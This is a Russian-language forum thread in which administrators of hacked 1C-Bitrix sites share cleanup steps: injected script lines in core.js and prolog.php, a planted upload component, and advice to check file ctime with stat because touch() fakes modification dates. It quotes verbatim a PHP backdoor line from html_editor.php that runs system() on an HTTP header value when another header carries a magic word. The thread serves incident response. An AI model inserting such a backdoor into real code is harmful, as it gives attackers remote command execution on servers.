Форум

У меня тоже нашлась крайне странная папка похожая, снёс её нафиг - посмотрим.

Обновление ядра не помогло ранее.  

поиском поищите, либо методом исключения ... уже встроенную рабочую иньекцию думаю найти то можно

вообще вот хорошая статья на эту тему (но это от будущих заражений, то что уже заражено нужно самому вычистить).

https://kuratov.ru/blog/bitriks-v-bede-sajty-na-bitriks-podverglis-atake/

Пишут, что зараза редиректит на фейковый сайт озона - а это попахивает "жареным" т.е. посетители запросто могут там что то приобрести ...

Если коротенько
* чистим /bitrix/js/main/core/core.js  (в конце - строчка начинается с s=document.createElement(script) )
* чистим /bitrix/modules/main/include/prolog.php (в конце - строчка подключения jqueryui.js)
* убиваем /bitrix/components/bitrix/main.file.input/main.php (я так понимаю скрипт управления - чтоб проще заливать было что захочешь)
* чистим /bitrix/modules/fileman/classes/general/html_editor.php (вырезаем 2 строчки - бэкдор на выполнение system())
"spell_word" => $_SERVER['HTTP_S'] == "bermuda" ? die(system($_SERVER['HTTP_P'])) : "",
И
if(substr($_POST['bxu_info']['CID'], 0, 7 ) === "default") die();

Внимание! - искать не полностью по вхождению т.к. у меня вместо bermuda было speaker

А в следующей статье - как залатать дыры, чтобы такое больше не появлялось,
правда боюсь с такой реализацией могут быть проблемы с встроенным html редактором - поэтому думаю правильнее просто обновить Битрикс до актуальной версии.

https://dzen.ru/media/mills/virusy-na-1sbitriks-2022g-62d158c2c4469e06dcb158a4

Я так понимаю автор цитаты, которую вы комментировали удалил свое сообщение, Даже через локальный поиск яндекса не смог найти. Вообщем шило на мыло автор заменил. Если уже переезжать, то на фреймворк.

Да, хотел бы прояснить одну ситуацию: дата изменения файла. Говорите, что файл main.php и прочие были модифицированы последний раз очень давно. Если бы не одно "но". Из PHP дата изменения файла меняется через команду touch(). Эта команда меняет время модификации файла, так называемый mtime. Но она не меняет время изменения статуса файла, т.е. время изменения свойств и метаданных файла, т.е. ctime. В консоли линукса нужно запустить команду stat имя_файла, т.е. например, чтобы посмотреть ctime для файла /bitrix/components/bitrix/main.file.input/main.php, вводим:Или заходим в папку, содержащую файл, и набираем(обратите внимание на точку перед слэшем).
В итоге мы получим такую картину:Все файлы в этой папке датированы 2022-01-13, что мы и наблюдаем в строке "Modify". Но фактически файл был изменен 25 ноября - строка "Change".
Это подтвердилось в ситуации, когда я проверял другой файл. 26.12.2022 года была сделана резервная копия сайта и развернута на компе, 27.12.2022 в проверяемом файле появились изменения, но дата изменения этого файла стояла вообще апрелем 2022. На компе же изменений в этом файле не оказалось. И только командой stat смог узнать, что на самом деле файл был изменен 27.12.2022.

Так что те, у кого файл датирован то 2019 годом, то еще каким-то, проверьте строку "Change" через команду stat (если, конечно, сами этот файл не трогали).